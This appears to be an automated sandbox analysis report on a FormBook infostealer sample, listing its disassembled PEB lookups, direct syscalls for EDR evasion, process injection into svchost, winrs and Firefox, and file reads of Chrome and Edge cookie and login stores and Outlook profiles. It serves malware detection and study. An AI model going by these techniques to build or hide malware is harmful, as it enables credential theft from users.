Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]	2_2_034DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]	2_2_034BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]	2_2_0346CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]	2_2_0345EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]	2_2_0346CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]	2_2_03430AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]	2_2_03504A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]	2_2_03468A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]	2_2_03486AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]	2_2_034B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]	2_2_03504940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]	2_2_034BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]	2_2_034BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]	2_2_034B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]	2_2_034C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]	2_2_034C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]	2_2_034649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_034FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_034BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]	2_2_03460854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]	2_2_034BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_0101A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_0101A66C

Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01008189 SetUnhandledExceptionFilter,		0_2_01008189
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_010081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_010081AC

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\A2028041200SD.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\winrs.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: NULL target: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: NULL target: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\winrs.exe

Thread register set: target process: 1272

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\winrs.exe

Thread APC queued: target process: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\A2028041200SD.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2971008

Jump to behavior

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_0101B106 LogonUserW,

0_2_0101B106

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_00FE3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00FE3D19

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_0102411C SendInput,keybd_event,

0_2_0102411C

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_01027513 mouse_event,

0_2_01027513

Source: C:\Users\user\Desktop\A2028041200SD.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\A2028041200SD.exe"	Jump to behavior
Source: C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe	Process created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\A2028041200SD.exe

0_2_0101A66C

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_010271FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_010271FA

Source: ohrkzzHWPesnQB.exe, 00000003.00000002.3877987467.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000003.00000000.2055254526.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000006.00000000.2201667447.0000000001681000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: A2028041200SD.exe, ohrkzzHWPesnQB.exe, 00000003.00000002.3877987467.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000003.00000000.2055254526.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000006.00000000.2201667447.0000000001681000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ohrkzzHWPesnQB.exe, 00000003.00000002.3877987467.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000003.00000000.2055254526.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000006.00000000.2201667447.0000000001681000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: A2028041200SD.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: ohrkzzHWPesnQB.exe, 00000003.00000002.3877987467.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000003.00000000.2055254526.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000006.00000000.2201667447.0000000001681000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_010065C4 cpuid

0_2_010065C4

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_0103091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_0103091D

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_0105B340 GetUserNameW,

0_2_0105B340

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_01011E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_01011E8E

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_00FFDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00FFDDC0

Binary or memory string: procmon.exe

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3877193379.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2131899884.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3878300512.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3878218687.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2131524712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3878239458.0000000002E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3879766244.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2132464837.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\winrs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\winrs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: A2028041200SD.exe	Binary or memory string: WIN_81
